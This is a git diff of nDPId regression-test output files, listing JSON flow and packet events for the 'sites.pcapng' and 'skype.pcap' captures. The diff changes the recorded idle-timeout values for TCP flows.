+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} 
00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495785326,"flow_last_seen":1646495785351,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495837086,"flow_last_seen":1646495837102,"flow_idle_time":180000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":520,"packets-processed":520,"total-skipped-flows":0,"total-l4-data-len":238171,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":43,"total-detection-updates":49,"total-updates":0,"current-active-flows":0,"total-active-flows":47,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":338,"global_ts_msec":1646568788847} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 520/520 diff --git a/test/results/skype.pcap.out b/test/results/skype.pcap.out index ed3b25e44..6662d8c1d 100644 --- a/test/results/skype.pcap.out +++ b/test/results/skype.pcap.out 
@@ -24,8 +24,8 @@ 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1431969642334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1431969642334,"pkt":"0NQSxnP1PBXCt3IOCABFAABXAnAAAEAR9LLAqAEiwKgBAeU5ADUAQzJbSPEBAAABAAAAAAAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAE="} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642334,"flow_last_seen":1431969642334,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1431969642334,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642336,"flow_last_seen":1431969642336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642336,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":50026,"dst_port":40002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1431969642336,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642336,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5NNAAEAGc8HAqAEiQTffIcNqnEKAlL6TAAAAALAC\/\/\/spQAAAgQFtAEDAwUBAQgKPiKLPAAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431969642337,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969642337,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+t\/gAAEARP0PAqAEiwKgBAcKBADUAKu5ghe0BAAABAAAAAAAABGRzbjQBZAVza3lwZQNuZXQAAAEAAQ=="} 
00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -34,8 +34,8 @@ 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642337,"flow_last_seen":1431969642337,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969642337,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn4.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1431969642376,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969642376,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+lUAQEJvL9OBgAABAAEAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAQABBffSSI="} 00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642318,"flow_last_seen":1431969642376,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 
{"query":"e7768.b.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.223.73.34"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642376,"flow_last_seen":1431969642376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969642376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431969642376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969642376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw0tAAEAGVKHAqAEiF99JIsNrAbvkkjeSAAAAALAC\/\/9pYAAAAgQFtAEDAwUBAQgKPiKLYwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431969642398,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431969642398,"pkt":"0NQSxnP1PBXCt3IOCABFAABKxdsAAEARMVTAqAEiwKgBAcNGADUANrH\/diQBAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDYBcgVza3lwZQNuZXQAAAEAAQ=="} 
00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"skype.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49990,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -44,17 +44,17 @@ 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"skype.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642398,"flow_last_seen":1431969642398,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969642398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57288,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst6.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1431969642400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1431969642400,"pkt":"PBXCt3IO0NQSxnP1CABFAACYAABAAEARtuHAqAEBwKgBIgA15TkAhAy4SPGBgAABAAAAAQAADkRCM01TR1I1MDExNzA5B2dhdGV3YXkJbWVzc2VuZ2VyBGxpdmUDY29tAAAcAAHALQAGAAEAAArBADUDbnMxBG1zZnQDbmV0AAZtc25oc3QJbWljcm9zb2Z0wDJ4Gz7uAAAcIAAAA4QAJOoAAAAOEA=="} 00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"skype.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969642334,"flow_last_seen":1431969642400,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431969642400,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":58681,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1431969642433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969642433,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGIPEX30kiwKgBIgG7w2sxgMP95JI3k6ASOJD6qQAAAgQFrAQCCAr301nQPiKLYwEDAwU="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1431969642434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969642434,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0zNJAAEAGSybAqAEiF99JIsNrAbvkkjeTMYDD\/oAQECxRlwAAAQEICj4ii5z301nQ"} 